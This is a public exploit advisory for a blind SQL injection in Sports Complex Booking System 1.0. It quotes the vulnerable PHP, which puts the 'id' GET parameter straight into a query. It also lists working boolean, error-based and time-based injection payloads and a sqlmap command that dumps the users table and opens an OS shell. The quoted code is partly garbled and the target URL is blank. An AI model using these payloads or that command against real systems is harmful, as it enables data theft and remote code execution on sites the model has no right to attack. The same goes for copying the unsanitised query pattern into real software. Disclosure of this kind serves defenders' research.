Sports Complex Booking System 1.0 SQL Injection

Sports Complex Booking System version 1.0 suffers from a remote blind SQL injection vulnerability that can be used to escalate privileges and execute code.

MD5 | 198e99bd9735413efa8ab6e715ef5578

# Title: Sports Complex Booking System 1.0 Blind SQLi To Rce
# Author: Hejap Zairy
# Date: 24.07.2022
# Vendor:
# Software:
# Reference:
# Tested on: Windows, MySQL, Apache

#vulnerability Code php

if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT f.*, as category from `facility_list` f inner join category_list c on f.category_id = where = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=view_facility&id=4' AND 1013=1013-- aQIm

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: p=view_facility&id=4' OR (SELECT 7626 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(7626=7626,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SkTl

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=view_facility&id=4' AND (SELECT 5013 FROM (SELECT(SLEEP(5)))lCeY)-- pdUo

#Blind SQLi Time to Rce

sqlmap -u '' --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p id -D scbs -T users --dump --os-shell

# Description:
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc

# Proof and Exploit:

Related Posts